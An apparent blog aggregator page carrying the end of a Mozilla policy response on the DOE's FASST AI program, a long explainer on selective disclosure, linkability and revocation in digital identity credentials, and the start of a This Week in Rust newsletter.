    • Expanding the Market for AI: While costs are rapidly decreasing, the use of cutting edge AI products purchased from major labs and big tech companies are not cheap. Many small businesses, research institutions, and nonprofits would be unable to benefit from the AI boom if they did not have the option to use freely available open source AI models. This means that more people around the world get access to American built open source technologies, furthering the use of American technology tools and standards, while forging deeper economic and technological ties.
    • Security & Safety: Open source has had demonstrable security and safety benefits. Rather than a model of “security through obscurity,” open source AI thrives from having many eyes examining code bases and models for exploits by harnessing the wisdom of the crowd to find issues, whether related to discriminatory outputs from LLMs or security vulnerabilities.
    • Resource Optimization: Open source in AI means more than freely downloadable model weights – it means considering how to make the entire AI stack more open and transparent, from the energy cost of training to data on the resources used to develop the chips necessary to train and operate AI models. By making more information on AI’s resource usage open and transparent, we can collectively work to optimize the efficiency of AI, ensuring that the benefits truly outweigh the costs.
  • Keep Competition Top of Mind: The U.S. government wields outsized influence in shaping markets as its role not just as a promulgator of standards and regulations but due to its purchasing power. We urge the DOE to consider broader competitive concerns when determining potential vendors and partnerships for products and services, ranging from cloud resources to semiconductors. This would foster a more competitive AI ecosystem, as noted in OMB’s guidance to Advance the Responsible Acquisition of AI in Government which highlights the importance of promoting competition in procurement of AI. The DOE should make an effort to work with a range of  partners and civil society organizations rather than defaulting to standard government partners and big tech companies.
  • Making FASST “Public” By Default: It is critical that as FASST engages in the development of new models, datasets, and other tools and resources, it defaults to making its work public by default. This may mean directly open sourcing datasets and models, or working with partners, civil society, academia, and beyond to advance access to AI assets which can provide public value.

We applaud DOE’s commitment to advancing open, public-focused AI, and we’re excited about the potential of the FASST program. Mozilla is eager to work alongside DOE and other partners to make sure FASST supports the development of technology that serves the public good. Here’s to a future where AI is open, accessible, and beneficial for everyone.

The post Mozilla Responds to DOE’s RFI on the Frontiers in AI for Science, Security, and Technology (FASST) appeared first on Open Policy & Advocacy.

Martin ThompsonEverything you need to know about selective disclosure

Why does this matter?

A lot of governments are engaging with projects to build “Digital Public Infrastructure”. That term covers a range of projects, but one of the common and integral pieces relates to government-backed identity services. While some places have had some form of digital identity system for years — hi Estonia! — there are many more governments looking to roll out some sort of digital identity wallet for their citizens. Notably, the European Union recently passed a major update to their European Digital Identity Regulation, which seeks to have a union-wide digital identity system for all European citizens. India’s Aadhaar is still the largest such project with well over a billion people enrolled.

There are a few ways that these systems end up being implemented, but most take the same basic shape. A government agency will be charged with issuing people with credentials. That might be tied to driver licensing, medical services, passports, or it could be a new identity agency. That agency issues digital credentials that are destined for wallets in phones. Then, services can request that people present these credentials at certain points, as necessary.

The basic model that is generally used looks something like this:

Three boxes with arrows between each in series, in turn labeled: Issuer, Holder, Verifier

The government agency is the “issuer”, your wallet app is a “holder”, and the service that wants your identity information is a “verifier”.

This is a model for digital credentials that is useful in describing a lot of different interactions. A key piece of that model is the difference between a credential, which is the thing that ends up in a wallet, and a presentation, which is what you show a verifier.

This document focuses on online use cases. That is, where you might be asked to present information about your identity to a website Though there are many other uses for identity systems, online presentation of identity is becoming more common. How we use identity online is likely to shape how identity is used more broadly.

The goal of this post is to provide information and maybe a fresh perspective on the topic. This piece also has a conclusion that suggests that the truly hard problems in online identity are not technical in nature, so do not necessarily benefit from the use of selective disclosure. As much as selective disclosure is useful in some contexts, there are significant challenges in deploying it on the Web.

What is selective disclosure?

A presentation might be a reduced form of the credential. Let’s say that you have a driver license, like the following:

A photo of a (fake) Hawaii driver license

One way of thinking about selective disclosure is to think of it as redacting those parts of the credential that you don’t want to share.

Let’s say that you want to show that you are old enough to buy alcohol. You might imagine doing something like this:

A photo of a (fake) Hawaii driver license with some fields covered with black boxes

That is, if you were presenting that credential to a store in person, you would want to show that the card truly belongs to you and that you are old enough.

If you aren’t turning up in person, the photo and physical description are not that helpful, so you might cover those as well.

You don’t need to share your exact birth date to show that you are old enough. You might be able to cover the month and day of those too. That is still too much information, but the best you can easily manage with a black highlighter.

If there was a “can buy alcohol” field on the license, that might be even better. But the age at which you can legally buy alcohol varies quite a bit across the world. And laws apply to the location, not the person. A 19 year old from Canada can’t buy alcohol in the US just because they can buy alcohol at home[1]. Most digital credential systems have special fields to allow for this sort of rule, so that a US[2] liquor store could use an “over_21” property, whereas a purchase in Canada might check for “over_18” or “over_19” depending on the province.

Simple digital credentials

The simplest form of digital credential is a bag of attributes, covered by a digital signature from a recognized authority. For instance, this might be a JSON Web Token, which is basically just a digitally-signed chunk of JSON.

For our purposes, let’s run with the example, which we’d form into something like this:

{
  "number": "01-47-87441",
  "name": "McLOVIN",
  "address": "892 MOMONA ST, HONOLULU, HI 96820",
  "iss": "1998-06-18",
  "exp": "2008-06-03",
  "dob": "1981-06-03",
  "over_18": true,
  "over_21": true,
  "over_55": false,
  "ht": "5'10",
  ...
}

That could then be wrapped up and signed by whatever Hawaiian DMV issues the license. Something like this:

Two nested boxes, the inner containing text "McLOVIN's Details"; the outer containing text "Digital Signature"

That isn’t perfect, because a blob of bytes like that can just be copied around by anyone that receives that credential. Anyone that received a credential could “impersonate” our poor friend.

The way that problem is addressed is through the use of a digital wallet. The issuer requires that the wallet hold a second signing key. The wallet provides the issuer with an attestation, which is just evidence from the wallet maker (which is often the maker of your phone) that they are holding a private key in a place where it can’t be moved or copied[3]. That attestation includes the public key that matches that private key.

Once the issuer is sure that the private key is tied to the device, the issuer produces a credential that lists the public key from the wallet.

In order to use the credential, the wallet signs the credential along with some other stuff, like the current time and maybe the identity of the verifier[4], as follows:

Nested boxes, the outer containing text "Digital signature using the Private Key from McLOVIN's Wallet"; two at the next level the first containing text "Verifier Identity, Date and Time, etc...", the other containing text "Digital Signature using the Private Key of the Hawaii DMV"; the latter box contains two further boxes containing text "McLOVIN's Details" and "McLOVIN's Wallet Public Key"

With something like this, unless someone is able to use the signing key that is in the wallet, they can’t generate a presentation that a verifier will accept. It also ensures that the wallet can use a biometric or password check to ensure that a presentation is only created when the person allows it.

That is a basic presentation that includes all the information that the issuer knows about. The problem is that this is probably more than you might be comfortable with sharing with a liquor store. After all, while you might be able to rely on the fact that the cashier in a store isn’t copying down your license details, you just know that any digital information you present is going to be saved, stored, and sold. That’s where selective disclosure is supposed to help.

Salted hash selective disclosure

One basic idea behind selective disclosure is to replace all of the data elements in a credential — or at least the ones that someone might want to keep to themselves — with placeholders. Those placeholders are replaced with a commitment to the actual values. Any values that someone wants to reveal are then included in the presentation. A verifier can validate that the revealed value matches the commitment.

The most basic sort of commitment is a hash commitment. That uses a hash function, which is really anything where it is hard to produce two inputs that result in the same output. The commitment to a value of X is H(X).

That is, you might replace the (“name”, “McLOVIN”) with a commitment like H(“name” || “McLOVIN”). The hash function ensures that it is easy to validate that the underlying values match the commitment, because the verifier can compute the hash for themselves. But it is basically impossible to recover the original values from the hash. And it is similarly difficult to find another set of values that hash to the same value, so you can’t easily substitute false information.

A key problem with a hash commitment is that a simple hash commitment only works to protect the value of the input if that input is hard to guess in the first place. But most of the stuff on a license is pretty easy to guess in one way or another. For simple stuff like “over_21”, there are just two values: “true” or “false”. If you want to know the original value, you can just check each of the values and see which matches.

Even for fields that have more values, it is possible to build a big table of hash values for every possible (or likely) value. This is called a “rainbow table”[5].

A diagram showing mappings from hashes to values

Rainbow tables don’t work if the committed value very hard to guess. So, in addition to the value of the field, a large random number is added to the hidden value. This number is called “salt” and a different value needs to be generated for every field that can be hidden, with different values for every new credential. As long as there are many more values for the salt than can reasonably be stored in a rainbow table, there is no easy way to work out which commitment corresponds to which value.

So for each field, the issuer generates a random number and replaces all fields in the credential with H(salt || name || value), using some agreed encoding. The issuer then signs over those commitments and provides the wallet with a credential that is full of commitments, plus the full set of values that were committed to, including the associated salt.

A credential containing commitments to values, with the value and associated salt alongside

The wallet can then use the salt and the credential to reveal a value and prove that it was included in the credential, creating a presentation something like this:

A presentation using the credential, with selected values and their salt alongside

The verifier then gets a bunch of fields with the key information replaced with commitments. All of the commitments are then signed by the issuer. The verifier also gets some number of unsigned tuples of (salt, name, value). The verifier can then check that H(salt || name || value) matches one of the commitments.

This is the basic design that underpins a number of selective disclosure designs. Salted hash selective disclosure is pretty simple to build because it doesn’t require any fancy cryptography. However, salted hash designs have some limitations that can be a little surprising.

Other selective disclosure approaches

There are other approaches that might be used to solve this problem. Imagine that you had a set of credentials, each of which contained a single attribute. You might imagine sharing each of those credentials separately, choosing which ones you show based on what the situation demanded.

That might look something like this:

A presentation that includes multiple separate credentials, each with a single attribute

Having multiple signatures can be nefficient, but this basic idea is approximately sound[7]. There are a lot of signatures, which would make a presentation pretty unwieldy if there were lots of properties. There are digital signature schemes that make this more efficient though, like the BLS scheme, which allows multiple signatures to be folded into one.

That is the basic idea behind SD-BLS. SD-BLS doesn’t make it cheaper for an issuer. An issuer still needs to sign a whole bunch of separate attributes. But combining signatures means that it can make presentations smaller and easier to verify. SD-BLS has some privacy advantages over salted hashes, but the primary problem that the SD-BLS proposal aims to solve is revocation, which is covered in more detail below.

Problems with salted hashes

Going back to the original example, the effect of the salted hash is that you probably get something like this:

A Hawaii driver license with all the fields covered with gray rectangles, except the expiry date

Imagine that every field on the license is covered with the gray stuff you get on scratch lottery tickets. You can choose which to scratch off before you hand it to someone else[8]. Here’s what they learn:

  1. That this is a valid Hawaii driver license. That is, they learn who issued the credential.
  2. When the license expires.
  3. The value of the fields that you decided to reveal.
  4. How many fields you decided not to reveal.
  5. Any other places that you present that same credential, as discussed below.

On the plus side, and contrary to what is shown for a physical credential, the size and position of fields is not revealed for a digital credential.

Still, that is likely a bit more information than might be expected. If you only wanted to reveal the “over_21” field so that you could buy some booze, having to reveal all those other things isn’t exactly ideal.

Revealing who issued the credential seems like it might be harmless, but for a digital credential, that’s revealing a lot more than your eligibility to obtain liquor. Potentially a lot more. Maybe in Hawaii, holding a Hawaii driver license isn’t notable, but it might be distinguishing — or even disqualifying — in other places. A Hawaii driver license reveals that you likely live in Hawaii, which is not exactly relevant to your alcohol purchase. It might not even be recognized as valid in some places.

If the Hawaiian DMV uses multiple keys to issue credentials, you’ll also reveal which of those keys was used. That’s unlikely to be a big deal, but worth keeping in mind as we look at alternative approaches.

Revealing the number of fields is a relatively minor information leak. This constrains the design a little, but not in a serious way. Basically, it means that you should probably have the same set of fields for everyone.

For instance, you can’t include only the “over_XX” age fields that are true; you have to include the false ones as well or the number of fields would reveal an approximate age. That is, avoid:

{ ..., "older_than": [16, 18], ... }

Note: Some formats allow individual items in lists like this to be committed separately. The name of the list is generally revealed in that case, but the specific values are hidden. These usually just use H(salt || value) as the commitment.

And instead use:

{ ..., "over_16": true, "over_18": true, "over_21": false, "over_55": false, ... }

Expiration dates are tricky. For some purposes, like verifying that someone is allowed to drive, the verifier will need to know if the credential is not expired.

On the other hand, expiry is probably not very useful for something like age verification. After all, it’s not like you get younger once your license expires.

The exact choice of expiration date might also carry surprising information. Imagine that only one person was able to get a license one day because the office had to close or the machine broke down. If the expiry date is a fixed time after issuance, the expiry date on their license would then be unique to them, which means that revealing that expiration date would effectively be identifying them.

The final challenge here is the least obvious and most serious shortcoming of this approach: linkability.

Linkability and selective disclosure

A salted hash credential carries several things that makes the credential itself identifiable. This includes the following:

  • The value of each commitment is unique and distinctive.
  • The public key for the wallet.
  • The signature that the issuer attaches to the credential.

Each of these is unique, so if the same credential is used in two places, it will clearly indicate that this is the same person, even if the information that is revealed is very limited.

For example, you might present an “over_21” to purchase alcohol in one place, then use the full credential somewhere else. If those two presentations use the same credential, those two sites will be able to match up the presentations. The entity that obtains the full credential can then share all that knowledge with the one that only knows you are over 21, without your involvement.

A version of the issuer-holder-verifier diagram with multiple verifiers

Even if the two sites only receive limited information, they can still combine the information they obtain — that you are over 21 and what you did on each site — into a profile. The building of that sort of profile online is known as unsanctioned tracking and generally regarded as a bad thing.

This sort of matching is technically called verifier-verifier linkability. The way that it can be prevented is to ensure that a completely fresh credential is used for every presentation. That includes a fresh set of commitments, a new public key from the wallet, and a new signature from the issuer (naturally, the thing that is being signed is new). At the same time, ensuring that the presentation doesn’t include any extraneous information, like expiry dates, helps.

A system like this means that wallets need to be able to handle a whole lot of credentials, including fresh public keys for each. The wallet also needs to be able to handle cases where its store of credentials run out, especially when the wallet is unable to contact the issuer.

Issuers generally need to be able to issue larger batches of credentials to avoid that happening. That involves a lot of computationally intensive work for the issuer. This makes wallets quite a bit more complex. It also increases the cost of running issuance services because they need better availability, not just because they need more issuance capacity.

In this case, SD-BLS has a small advantage over salted hashes because its “unregroupability” property means that presentations with differing sets of attributes are not linkable by verifiers. That’s a weaker guarantee than verifier-verifier unlinkability, because presentations with the same set of attributes can still be linked by a verifier; for that, fresh credentials are necessary.

Using a completely fresh credential is a fairly effective way to protect against linkability for different verifiers, but it does nothing to prevent verifier-issuer linkability. An issuer can remember the values they saw when they issued the credential. A verifier can take any one of the values from a presentation they receive (commitments, public key, or signature) and ask the issuer to fill in the blanks. The issuer and verifier can then share anything that they know about the person, not limited to what is included in the credential.

A version of the issuer-holder-verifier diagram with a bidirectional arrow between issuer and verifier

What the issuer and verifier can share isn’t limited to the credential. They can share anything they know, not just the stuff that was included in the credential. Maybe McLovin needed to show a passport and a utility bill in order to get a license and the DMV kept a copy. The issuer could give that information to the verifier. The verifier can also share what they have learned about the person, like what sort of alcohol they purchased.

Useful linkability

In some cases, linkability might be a useful or essential feature. Imagine that selective disclosure is used to authorize access to a system that might be misused. Selective disclosure avoids exposing the system to information that is not essential. Maybe the system is not well suited to safeguarding private information. The system only logs access attempts and the presentation that was used.

In the event that the access results in some abuse, the abuse could be investigated using verifier-issuer linkability. For example, the access could be matched to information available to the issuer to find out who was responsible for the abuse.

The IETF is developing a couple of salted hash formats (in JSON and CBOR) that should be well suited to a number of applications where linkability is a desirable property.

All of this is a pretty serious problem for use for something like online age verification. Having issuers, which are often government agencies, being in a position to trace activity, might have an undesirable chilling effect. This is something that legislators generally recognize and laws often include provisions that require unlinkability[9].

In short, salted hash based systems only work if you trust the issuer.

Linkable attributes

There is not much point in avoiding linkability when the disclosed information is directly linkable. For instance, if you selectively disclose your name and date of birth, that information is probably unique or highly identifying. Revealing identifying information to a verifier makes verifier-issuer linkability easy; just like revealing the same information to two verifiers makes verifier-verifier linkability simple.

This makes linkability for selective disclosure less concerning when it comes to revealing information that might be identifying.

Unlinkability therefore tends to be most useful for non-identifying attributes. Simple attributes — like whether someone meets a minimum age requirement, holds a particular qualification, or has authorization — are less likely to be inherently linkable, so are best suited to being selectively disclosed.

Privacy Pass

If the goal is to provide a simple signal, such as whether a person is older than a target age, Privacy Pass is specifically designed to prevent verifier-issuer linkability.

Privacy Pass also includes options that split the issuer into two separate functions — an issuer and an attester — where the attester is responsible for determining if a holder (or client) has the traits required for token issuance and the issuer only creates the tokens. This might be used to provide additional privacy protection.

The four entities of the Privacy Pass architecture: Issuer, Attester, Holder/Client, and Verifier/Service

A Privacy Pass issuer could produce a token that signifies possession of a given trait. Only those with the trait would receive the token. For age verification, the token might signify that a person is at a selected age or older.

Token formats for Privacy Pass that include limited public information are also defined, which might be used to support selective disclosure. This is far less flexible than the salted hash approach as a fresh token needs to be minted with the set of traits that will be public. That requires that the issuer is more actively involved or that the different sets of public traits are known ahead of time.

Privacy Pass does not naturally provide verifier-verifier unlinkability, but a fresh token could be used for each usage, just like for the salted hash design. Some of the Privacy Pass modes can issue a batch of tokens for this reason.

In order to provide tokens for different age thresholds or traits, an issuer would need to use different public keys, each corresponding to a different trait.

Privacy Pass is therefore a credible alternative to the use of salted hash selective disclosure for very narrow cases. It is somewhat inflexible in terms of what can be expressed, but that could mean more deliberate additions of capabilities. The strong verifier-issuer unlinkability is definitely a plus, but it isn’t without shortcomings.

Key consistency

One weakness of Privacy Pass is that it depends on the issuer using the same key for everyone. The ideal privacy is provided when there is a single issuer with just one key for each trait. With more keys or more issuers, the key that is used to generate a token carries information, revealing who issued the token. This is just like the salted hash example where the verifier needs to learn that the Hawaiian DMV issued the credential.

The privacy of the system breaks down if every person receives tokens that are generated using a key that is unique to them. This risk can be limited through the use of key consistency schemes. This makes the system a little bit harder to deploy and operate.

As foreshadowed earlier, the same key switching concern also applies to a salted hash design if you don’t trust the issuer. Of course, we’ve already established that a salted hash design basically only works if you trust the issuer. Salted hash presentations are linkable based on commitments, keys, or signatures, so there is no real need to play games with keys.

Anonymous credentials

A zero knowledge proof enables the construction of evidence that a prover knows something, without revealing that information. For an identity system, it allows a holder to make assertions about a credential without revealing that credential. That creates what is called an anonymous credential.

Anonymous credentials are appealing as the basis for a credential system because the proofs themselves contain no information that might link them to the original credential.

Verifier-issuer unlinkability is a natural consequence of using a zero knowledge proof. Verifier-verifier unlinkability would be guaranteed by providing a fresh proof for each verifier, which is possible without obtaining a fresh credential. The result is that anonymous credentials provide excellent privacy characteristics.

Zero knowledge proofs trace back to systems of provable computation, which mean that they are potentially very flexible. A proof can be used to prove any property that can be computed. The primary cost is in the amount of computation it takes to produce and validate the proof[10]. If the underlying credential can be adjusted to support the zero knowledge system, these costs can be reduced, which is what the BBS signature scheme does. Unmodified credentials can be used if necessary.

Thus, a proof statement for use in age verification might be a machine translation of the following compound statement:

  • this holder has a credential signed by the Hawaiian DMV;
  • the expiration date on the credential is later than the current date;
  • the person is 21 or older (or the date of birth plus 21 years is earlier than the current date);
  • the holder knows the secret key associated with the public key mentioned in the credential; and,
  • the credential has not been used with the current verifier more than once on this day[11].

A statement in that form should be sufficient to establish that someone is old enough to purchase alcohol, while providing assurances that the credential was not stolen or reused. The only information that is revealed is that this is a valid Hawaiian license. We’ll see below how hiding that last bit is also possible and probably a good idea.

Reuse protections

The last statement from the set of statements above provides evidence that the credential has not been shared with others. This condition, or something like it, is a necessary piece of building a zero-knowledge system. Otherwise, the same credential can be used and reused many times by multiple people.

Limiting the number of uses doesn’t guarantee that a credential isn’t shared, but it limits the number of times that it can be reused. If the credential can only be used once per day, then that is how many times the credential can be misused by someone other than the person it was issued to.

Choosing how many times a credential might be used will vary on the exact circumstances. For instance, it might not be necessary to have the same person present proof of age to an alcohol vendor multiple times per day. Maybe it would be reasonable for the store to remember them if they come back to make multiple purchases on any given day. One use per day might be reasonable on that assumption.

In practice, multiple rate limits might be used. This can make the system more flexible over short periods (to allow for people making multiple alcohol purchases in a day) but also stricter over the long term (because people rarely need to make multiple purchases every day). For example, age checks for the purchase of alcohol might combine a three per day limit with a weekly limit of seven. Multiple conditions can be easily added to the proof, with a modest cost.

It is also possible for each verifier to specify their own rate limits according to their own conditions. A single holder would then limit the use of credentials according to those limits.

Tracking usage is easy for a single holder. An actor looking to abuse credentials by sharing and reusing them has more difficulty. A bad actor would need to carefully coordinate their reuse of a credential so that any rate limits were not exceeded.

Hiding the issuer of credentials

People often do not get to choose who issues them a credential. Revealing the identity of an issuer might be more identifying than is ideal. This is especially true for people who have credentials issued by an atypical issuer.

Consider that Europe is building a union-wide system of identity. That means that verifiers will be required to accept credentials from any country in the EU. Someone accessing a service in Portugal with an Estonian credential might be unusual if most people use a Portuguese credential. Even if the presentation is limited to something like age verification, the choice of issuer becomes identifying.

This could also mean that a credential that should be valid is not recognized as such by an issuer, simply because they chose not to consider that issuer. Businesses in Greece might be required by law to recognize other EU credentials, but what about a credential issued by Türkiye?

Zero knowledge proofs can also hide the issuer, only revealing that a credential was issued by one of a set of issuers. This means that a verifier is unable to discriminate on the basis of issuer. For a system that operates at scale, that creates positive outcomes for those who hold credentials from atypical issuers.

Credential revocation

Perhaps the hardest problem in any system that involves the issuance of credentials is what to do when the credential suddenly becomes invalid. For instance, if a holder is a phone, what do you do if the phone is lost or stolen?

That is the role of revocation. On the Web, certificate authorities are required to have revocation systems to deal with lost keys, attacks, change of ownership, and a range of other problems. For wallets, the risk of loss or compromise of wallets might also be addressed with revocation.

Revocation typically involves the verifier confirming with the issuer that the credential issued to the holder (or the holder itself) has not been revoked. That produces a tweak to our original three-entity system as follows:

Issuer-holder-verifier model with an arrow looping back from verifier to issuer

Revocation is often the most operationally challenging aspect of running identity infrastructure. While issuance might have real-time components — particularly if the issuer needs to ensure a constant supply of credentials to maintain unlinkability — credentials might be issued ahead of time. However, revocation often requires a real-time response or something close to it. That makes a system with revocation much more difficult to design and operate.

Revoking full presentations

When a full credential or more substantive information is compromised, lack of revocation creates a serious impersonation risk. The inability to validate biometrics online means that a wallet might be exploited to perform identity theft or similarly serious crimes. Being able to revoke a wallet could be a necessary component of such a system.

The situation with a complete credential presentation, or presentations that include identifying information, is therefore fairly simple. When the presentation contains identifying information, like names and addresses, preventing linkability provides no benefit. So providing a direct means of revocation checking is easy.

With verifier-issuer linkability, the verifier can just directly ask the issuer whether the credential was revoked. This is not possible if there is a need to perform offline verification, but it might be possible to postpone such checks or rely on batched revocations (CRLite is a great example of a batched revocation system). Straightforward or not, providing adequate scale and availability make the implementation of a reliable revocation system a difficult task.

Revoking anonymous credentials

When you have anonymous credentials, which protect against verifier-issuer linkability, revocation is very challenging. A zero-knowledge assertion that the credential has not been revoked is theoretically possible, but there are a number of serious challenges. One issue is that proof of non-revocation depends on providing real-time or near-real-time information about the underlying credential. Research into solving the problem is still active.

It is possible that revocation for some selective disclosure cases is unnecessary. Especially those cases where zero-knowledge proofs are used. We have already accepted some baseline amount of abuse of credentials, by virtue of permitting non-identifying and unlinkable presentations. Access to a stolen credential is roughly equivalent to sharing or borrowing a credential. So, as long as the overall availability of stolen credentials is not too high relative to the availability of borrowed credentials, the value of revocation is low. In other words, if we accept some risk that credentials will be borrowed, then we can also tolerate some use of stolen credentials.

Revocation complications

Even with linkability, revocation is not entirely trivial. Revocation effectively creates a remote kill switch for every credential that exists. The safeguards around that switch are therefore crucial in determining how the system behaves.

For example, if any person can ask for revocation, that might be used to deny a person the use of a perfectly valid credential. There are well documented cases where organized crime has deprived people of access to identification documents in order to limit their ability to travel or access services.

These problems are more tied to the processes that are used, rather than the technical design. However, technical measures might be used to improve the situation. For instance, SD-BLS suggests that threshold revocation be used, where multiple actors need to agree before a credential can be revoked.

All told, and especially if dealing with revocation on the Web has taught us anything, it might not be worth the effort to add revocation. It might be easier — and no less safe — to frequently update credentials.

Authorizing Verifiers

Selective disclosure systems can fail to achieve their goals if there is a power imbalance between verifiers and holders. For instance, a verifier might withhold services unless a person agrees to provide more information than the verifier genuinely requires. That is, the verifier might effectively extort people to provide non-essential information. A system that can withhold information to improve privacy is pointless unless attempts to exercise withholding are supported.

One way to work around this is to require that verifiers be certified before they can request certain information. For instance, EU digital identity laws require that it be possible to restrict who can request a presentation. This might involve the certification of verifiers, so that verifiers would be required to provide holders with evidence that they are authorized to receive certain attributes.

A system of verifier authorization could limit overreach, but it might also render credentials ineffective in unanticipated situations, including for interactions in foreign jurisdictions.

Authorizations also need monitoring for compliance. Businesses — particularly larger businesses that engage in many activities — might gain authorization for many different purposes. Abuse might occur if a broad authorization is used where a narrower authorization is needed. That means more than a system of authorization, but creating a way to ensure that businesses or agencies are accountable for their use of credentials.

Quantum computers

Some of these systems depend on cryptography that is only classically secure. That is, a sufficiently powerful quantum computer might be able to attack the system.

Salted hash selective disclosure relies only on digital signatures and hash functions, which makes them the most resilient to attacks that use a quantum computer. However, many of the other systems described rely on some version of the discrete logarithm problem being difficult, which can make them vulnerable. Predicting when a cryptographically-relevant quantum computer might be created is as hard as any other attempt to look into the future, but we can understand some of the risks.

Quantum computers present two potential threats to any system that relies on classical cryptographic algorithms: forgery and linkability.

A sufficiently powerful quantum computer might use something like Shor’s algorithm to recover the secret key used to issue credentials. Once that key has been obtained, new credentials could be easily forged. Of course, forgeries are only a threat after the key is recovered.

Some schemes that rely on classical algorithms could be vulnerable to linking by a quantum computer, which could present a very serious privacy risk. This sort of linkability is a serious problem because it potentially affects presentations that are made before the quantum computer exists. Presentations that were saved by verifiers could later be linked.

Some of the potential mechanisms, such as the BBS algorithm, are still able to provide privacy, even if that the underlying cryptography is broken by a quantum computer. The quantum computer would be able to create forgeries, but not break privacy by linking presentations.

If we don’t need to worry about forgery until a quantum computer exists and privacy is maintained even then, we are therefore largely concerned with how long we might be able to use these systems. That gets back to the problem of predictions and balancing the cost of deploying a system against how long the system is going to remain secure. Credential systems take a long time to deploy, so — while they are not vulnerable to a future advance in the same way as encryption — planning for that future is likely necessary.

The limitations of technical solutions

If there is a single conclusion to this article is that the problems that exist in identity systems are not primarily technical. There are several very difficult problems to consider when establishing a system. Those problems only start with the selection of technology.

Any technological choice presents its own problems. Selective disclosure is a powerful tool, but with limited applicability. Properties like linkability need to be understood or managed. Otherwise, the actual privacy properties of the system might not meet expectations. The same goes for any rate limits or revocation that might be integrated.

How different actors might participate in the system needs further consideration. Decisions about who might act as an issuer in the system needs a governance structure. Otherwise, some people might be unjustly denied the ability to participate.

For verifiers, their incentives need to be examined. A selective disclosure system might be built to be flexible, which might seem to empower people with choice about what they disclose, however that might be abused by powerful verifiers to extort additional information from people.

All of which to say is: better technology does not always help as much as you might hope. Many of the problems are people problems, social problems, and governance problems, not technical problems. Technical mechanisms tend to only change the shape of non-technical problems. That is only helpful if the new shape of the problem is something that people are better able to deal with.


  1. This is different from licensing to drive, where most countries recognize driving permits from other jurisdictions. That’s probably because buying alcohol is a simple check based on an objective measure, whereas driving a car is somewhat more involved. ↩︎

  2. Well, most of the US. It has to do with highways. ↩︎

  3. The issuer might want some additional assurances, like some controls over how the credential can be accessed, controls over what happens if a device is lost, stolen, or sold, but they all basically reduce to this basic idea. ↩︎

  4. If the presentation didn’t include information about the verifier and time of use, one verifier could copy the presentation they receive and impersonate the person. ↩︎

  5. Rainbow tables can handle relatively large numbers of values without too much difficulty. Even some of the richer fields can probably be put in a rainbow table. For example, there are about 1.4 million people in Hawaii. All the values for some fields are known, such as the complete set of possible addresses. Even if every person has a unique value, a very simple rainbow table for a field would take a few seconds to build and around 100Mb to store, likely a lot less. A century of birthdays would take much less storage[6]. ↩︎

  6. In practice, a century of birthdays (40k values) will have no collisions with even a short hash. You don’t need much more than 32 bits for that many values. Furthermore, if you are willing to have a small number of values associated with each hash, you can save even more space. 40k values can be indexed with a 16-bit value and a 32-bit hash will produce very few collisions. A small number of collisions are easy to resolve by hashing a few times, so maybe this could be stored in about 320kB with no real loss of utility. ↩︎

  7. There are a few things that need care, like whether different attributes can be bound to a different wallet key and whether the attributes need to show common provenance. With different keys, the holder might mix and match attributes from different people into a single presentation. ↩︎

  8. To continue the tortured analogy, imagine that you take a photo of the credential to present, so that the recipient can’t just scratch off the stuff that you didn’t. Or maybe you add a clear coat of enamel. ↩︎

  9. For example, Article 5a, 16 of the EU Digital Identity Framework requires that wallets “not allow providers of electronic attestations of attributes or any other party, after the issuance of the attestation of attributes, to obtain data that allows transactions or user behaviour to be tracked, linked or correlated, or knowledge of transactions or user behaviour to be otherwise obtained, unless explicitly authorised by the user”. ↩︎

  10. A proof can be arbitrarily complex, so this isn’t always cheap, but most of the things we imagine here are probably very manageable. ↩︎

  11. This isn’t quite accurate. The typical approach involves the use of tokens that repeat if the credential is reused too often. That makes it possible to catch reuse, not prevent it. ↩︎

This Week In RustThis Week in Rust 574

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation

EuroRust 2024

RustConf 2024

Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is fixed-slice-vec, a no-std dynamic length Vec with runtime-determined maximum capacity backed by a slice.

Thanks to Jay Oster for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
Rust
Rustup

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

480 pull requests were merged in the last week

Rust Compiler Performance Triage

We saw improvements to a large swath of benchmarks with the querification of MonoItem collection (PR #132566). There were also some PRs where we are willing to pay a compile-time cost for expected runtime benefit (PR #132870, PR #120370), or pay a small cost in the single-threaded case in exchange for a big parallel compilation win (PR #124780).

Triage done by @pnkfelix. Revision range: d4822c2d..7d40450b

2 Regressions, 4 Improvements, 10 Mixed; 6 of them in rollups 47 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs were approved this week.
Tracking Issues & PRs
Rust Cargo Language Team Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-11-20 - 2024-12-18 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

